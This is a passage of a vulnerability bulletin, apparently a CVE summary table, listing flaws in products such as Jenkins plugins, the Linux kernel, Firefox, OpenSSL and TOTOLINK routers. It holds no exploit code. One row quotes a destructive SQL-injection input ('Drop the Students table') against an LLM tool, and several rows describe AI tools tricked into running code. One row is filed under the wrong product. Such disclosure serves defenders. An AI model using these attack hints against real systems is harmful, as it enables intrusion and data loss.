Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group. | 2024-01-24 | not yet calculated | CVE-2024-23901 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL. | 2024-01-24 | not yet calculated | CVE-2024-23902 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. | 2024-01-24 | not yet calculated | CVE-2024-23903 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23904 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins Red Hat Dependency Analytics Plugin 0.7.1 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. | 2024-01-24 | not yet calculated | CVE-2024-23905 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jensen_of_scandinavia — eagle_1200 Â |
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter. | 2024-01-22 | not yet calculated | CVE-2023-24135 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| jfinalcms — jfinalcms  |
Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter. | 2024-01-23 | not yet calculated | CVE-2024-22496 cve@mitre.org |
| jfinalcms — jfinalcms  |
Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL. | 2024-01-23 | not yet calculated | CVE-2024-22497 cve@mitre.org |
| kanboard — kanboard  |
Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature. | 2024-01-24 | not yet calculated | CVE-2024-22720 cve@mitre.org |
| kimono-oldnew — mini-app_line  |
An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48129 cve@mitre.org |
| kosei entertainment — esportsstudiolegends_mini-app_line  |
An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48132 cve@mitre.org |
| leptoncms — leptoncms  |
An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file. | 2024-01-25 | not yet calculated | CVE-2024-24399 cve@mitre.org |
| linux — kernel  |
In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c. | 2024-01-23 | not yet calculated | CVE-2023-46343 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| linux — kernel  |
In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free. | 2024-01-23 | not yet calculated | CVE-2023-51042 cve@mitre.org cve@mitre.org |
| linux — kernel  |
In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload. | 2024-01-23 | not yet calculated | CVE-2023-51043 cve@mitre.org cve@mitre.org |
| linux — kernel  |
An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled. | 2024-01-23 | not yet calculated | CVE-2024-22705 cve@mitre.org cve@mitre.org |
| linux — kernel  |
In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c. | 2024-01-23 | not yet calculated | CVE-2024-23848 cve@mitre.org |
| linux — kernel  |
In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access. | 2024-01-23 | not yet calculated | CVE-2024-23849 cve@mitre.org cve@mitre.org |
| linux — kernel  |
In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation. | 2024-01-23 | not yet calculated | CVE-2024-23850 cve@mitre.org cve@mitre.org |
| linux — kernel  |
copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl. | 2024-01-23 | not yet calculated | CVE-2024-23851 cve@mitre.org cve@mitre.org |
| livesite — livesite  |
liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /livesite/edit_designer_region.php. | 2024-01-25 | not yet calculated | CVE-2024-22638 cve@mitre.org |
| llamaHub — llamahub  |
The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML. | 2024-01-21 | not yet calculated | CVE-2024-23730 cve@mitre.org cve@mitre.org cve@mitre.org |
| llamaindex — llamaindex  |
LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year’s student records via “Drop the Students table” within English language input. | 2024-01-22 | not yet calculated | CVE-2024-23751 cve@mitre.org |
| luxe_beauty_clinic — mini-app_line  |
An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48126 cve@mitre.org |
| mathtex — mathtex  |
Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component. | 2024-01-24 | not yet calculated | CVE-2023-51885 cve@mitre.org |
| mathtex — mathtex  |
Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using convertpath. | 2024-01-24 | not yet calculated | CVE-2023-51886 cve@mitre.org |
| mathtex — mathtex  |
Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL. | 2024-01-24 | not yet calculated | CVE-2023-51887 cve@mitre.org |
| mathtex — mathtex  |
Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51888 cve@mitre.org |
| mathtex — mathtex  |
Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51889 cve@mitre.org |
| mathtex — mathtex  |
An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attacker to consume CPU resources via crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51890 cve@mitre.org |
| mathtex — mathtex  |
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allow attackers to run arbitrary commands via the sub_415C80 function. | 2024-01-24 | not yet calculated | CVE-2023-52038 cve@mitre.org |
| mbed — tls  |
An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum. | 2024-01-21 | not yet calculated | CVE-2023-52353 cve@mitre.org |
| mbed — tls  |
An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions. | 2024-01-21 | not yet calculated | CVE-2024-23744 cve@mitre.org |
| mercari,_inc. — “mercari”_app_for_android  |
Improper authorization in handler for custom URL scheme issue in “Mercari” App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. | 2024-01-26 | not yet calculated | CVE-2024-23388 vultures@jpcert.or.jp |
| meross — msh30q  |
Meross MSH30Q 4.5.23 is vulnerable to Cleartext Transmission of Sensitive Information. During the device setup phase, the MSH30Q creates an unprotected Wi-Fi access point. In this phase, MSH30Q needs to connect to the Internet through a Wi-Fi router. This is why MSH30Q asks for the Wi-Fi network name (SSID) and the Wi-Fi network password. When the user enters the password, the transmission of the Wi-Fi password and name between the MSH30Q and mobile application is observed in the Wi-Fi network. Although the Wi-Fi password is encrypted, a part of the decryption algorithm is public so we complemented the missing parts to decrypt it. | 2024-01-23 | not yet calculated | CVE-2023-46889 cve@mitre.org |
| meross — msh30q  |
The radio frequency communication protocol being used by Meross MSH30Q 4.5.23 is vulnerable to replay attacks, allowing attackers to record and replay previously captured communication to execute unauthorized commands or actions (e.g., thermostat’s temperature). | 2024-01-23 | not yet calculated | CVE-2023-46892 cve@mitre.org |
| metagpt — metagpt  |
MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen. | 2024-01-22 | not yet calculated | CVE-2024-23750 cve@mitre.org |
| mimasaka_farm — mini-app_line  |
An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48135 cve@mitre.org |
| ministry_of_agriculture_forestry_and_fisheries — electronic_delivery_check_system_ministry_of_agriculture_forestry_and_fisheries_the_agriculture_and_rural_development_project_version_march_heisei_31_era_edition  |
Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-22380 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| ministry_of_defense — electronic_deliverables_creation_support_tool_(construction_edition) Â |
Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-21796 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| ministry_of_land_infrastructure_transport_and_tourism_japan — electronic_delivery_check_system_(doboku) Â |
Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-21765 vultures@jpcert.or.jp vultures@jpcert.or.jp vultures@jpcert.or.jp |
| mozilla — firefox  |
An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0741 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0742 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0743 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0744 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0745 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0746 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0747 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0748 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0749 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0750 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0751 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0752 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0753 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0754 security@mozilla.org security@mozilla.org |
| mozilla — firefox  |
Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0755 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
| mozilla — focus_for_ios  |
Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. | 2024-01-22 | not yet calculated | CVE-2024-0605 security@mozilla.org security@mozilla.org |
| mozilla — focus_for_ios  |
An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. | 2024-01-22 | not yet calculated | CVE-2024-0606 security@mozilla.org security@mozilla.org |
| multisigwallet– 0xf0c99 Â |
MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction. | 2024-01-19 | not yet calculated | CVE-2023-47033 cve@mitre.org cve@mitre.org |
| mygakuya– mini-app_line  |
An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48127 cve@mitre.org |
| myq — print_server  |
MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution. | 2024-01-23 | not yet calculated | CVE-2024-22076 cve@mitre.org cve@mitre.org |
| nagios — nagios cross-platform_agent_(ncpa) Â |
DOM-based Cross Site Scripting (XSS vulnerability in ‘Tail Event Logs’ functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4.0 allows attackers to run arbitrary code via the name element when filtering for a log. | 2024-01-24 | not yet calculated | CVE-2021-43584 cve@mitre.org |
| netsis_systems — mw5360  |
NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page. | 2024-01-25 | not yet calculated | CVE-2024-22729 cve@mitre.org |
| opennds — opennds  |
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38317 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| opennds — opennds  |
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38318 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| opennds — opennds  |
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38319 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| opennds — opennds  |
An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38323 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| openssl — openssl  |
Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. | 2024-01-26 | not yet calculated | CVE-2024-0727 openssl-security@openssl.org openssl-security@openssl.org openssl-security@openssl.org openssl-security@openssl.org openssl-security@openssl.org openssl-security@openssl.org |
| othanc — othanc  |
Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server’s error reporting. | 2024-01-24 | not yet calculated | CVE-2024-22725 cve@mitre.org cve@mitre.org |
| paddle — paddle  |
Code Injection in paddlepaddle/paddle | 2024-01-20 | not yet calculated | CVE-2024-0521 security@huntr.dev |
| pandasai — pandasai  |
GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660. | 2024-01-22 | not yet calculated | CVE-2024-23752 cve@mitre.org |
| plone — docker_official_image  |
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers. | 2024-01-25 | not yet calculated | CVE-2024-23055 cve@mitre.org cve@mitre.org cve@mitre.org |
| pluXml — pluxml  |
PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field. | 2024-01-25 | not yet calculated | CVE-2024-22636 cve@mitre.org |
| poco — utf32encoding.cpp  |
UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0. | 2024-01-27 | not yet calculated | CVE-2023-52389 cve@mitre.org cve@mitre.org cve@mitre.org |
| pops! — rebel  |
The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE. | 2024-01-20 | not yet calculated | CVE-2023-46447 cve@mitre.org cve@mitre.org cve@mitre.org |
| processwire — processwire  |
An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module. | 2024-01-24 | not yet calculated | CVE-2023-24676 cve@mitre.org |
| projectworlds — vistor_management_systemin_php  |
An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remote attacker to escalate privileges via a crafted script to the login page in the POST/index.php | 2024-01-25 | not yet calculated | CVE-2024-22922 cve@mitre.org cve@mitre.org cve@mitre.org |
| provectus — kafka-ui  |
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. | 2024-01-25 | not yet calculated | CVE-2023-52251 cve@mitre.org |
| quest_analytics_llc — iqcrm  |
SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page. | 2024-01-22 | not yet calculated | CVE-2023-48118 cve@mitre.org cve@mitre.org cve@mitre.org |
| redis — raft_master  |
Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c. | 2024-01-23 | not yet calculated | CVE-2023-31654 cve@mitre.org cve@mitre.org |
| regify — regipay_ client  |
An issue was discovered in Regify Regipay Client for Windows version 4.5.1.0 allows DLL hijacking: a user can trigger the execution of arbitrary code every time the product is executed. | 2024-01-24 | not yet calculated | CVE-2023-51711 cve@mitre.org |
| ros2 — foxy_fitzroy  |
Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. | 2024-01-23 | not yet calculated | CVE-2023-51199 cve@mitre.org |
| ros2 — foxy_fitzroy  |
An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials. | 2024-01-23 | not yet calculated | CVE-2023-51200 cve@mitre.org |
| ros2 — foxy_fitzroy  |
Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack. | 2024-01-23 | not yet calculated | CVE-2023-51201 cve@mitre.org |
| ros2 — foxy_fitzroy  |
An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file. | 2024-01-23 | not yet calculated | CVE-2023-51208 cve@mitre.org |
| rptc — 0x3b08c  |
RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations. | 2024-01-19 | not yet calculated | CVE-2023-47035 cve@mitre.org cve@mitre.org |
| shelly — trv_ 20220811-152343 Â |
Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware. | 2024-01-23 | not yet calculated | CVE-2023-42143 cve@mitre.org |
| shelly — trv_20220811-152343 Â |
Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password. | 2024-01-23 | not yet calculated | CVE-2023-42144 cve@mitre.org |
| solaxpower — pocket_wifi  |
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. The device provides a WiFi access point for initial configuration. The WiFi network provided has no network authentication (such as an encryption key) and persists permanently, including after enrollment and setup is complete. The WiFi network serves a web-based configuration utility, as well as an unauthenticated ModBus protocol interface. | 2024-01-23 | not yet calculated | CVE-2023-35835 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| solaxpower — pocket_wifi  |
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target’s Wi-Fi networks. | 2024-01-23 | not yet calculated | CVE-2023-35836 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| solaxpower — pocket_wifi  |
An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges. | 2024-01-23 | not yet calculated | CVE-2023-35837 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| splicecom — ipcs  |
A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack. | 2024-01-25 | not yet calculated | CVE-2023-33757 cve@mitre.org |
| spliceocm — maximiser_soft_pbx  |
Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component. | 2024-01-25 | not yet calculated | CVE-2023-33758 cve@mitre.org |
| spliceocm — maximiser_soft_pbx  |
SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack. | 2024-01-25 | not yet calculated | CVE-2023-33759 cve@mitre.org |
| spliceocm — maximiser_soft_pbx  |
SpliceCom Maximiser Soft PBX v1.5 and before was discovered to utilize a default SSL certificate. This issue can allow attackers to eavesdrop on communications via a man-in-the-middle attack. | 2024-01-25 | not yet calculated | CVE-2023-33760 cve@mitre.org |
| spoon_radio_japan_inc. — android_spoon_application  |
Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service. | 2024-01-24 | not yet calculated | CVE-2024-23453 vultures@jpcert.or.jp vultures@jpcert.or.jp vultures@jpcert.or.jp |
| sunlight — sunlightcms  |
Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component. | 2024-01-27 | not yet calculated | CVE-2023-48201 cve@mitre.org |
| sunlight — sunlightcms  |
Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component. | 2024-01-27 | not yet calculated | CVE-2023-48202 cve@mitre.org |
| totolink — a3700r  |
TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules | 2024-01-23 | not yet calculated | CVE-2024-22662 cve@mitre.org |
| totolink — a3700r  |
TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg | 2024-01-23 | not yet calculated | CVE-2024-22663 cve@mitre.org |
| totolink — x2000r  |
TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa. | 2024-01-25 | not yet calculated | CVE-2024-22529 cve@mitre.org |
| totolink — x6000r  |
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415AA4 function. | 2024-01-24 | not yet calculated | CVE-2023-52039 cve@mitre.org |
| totolink — x6000r  |
An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function. | 2024-01-24 | not yet calculated | CVE-2023-52040 cve@mitre.org |
| totolink — a3700r  |
TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg | 2024-01-23 | not yet calculated | CVE-2024-22660 cve@mitre.org |
| treandnet –tew-824dru  |
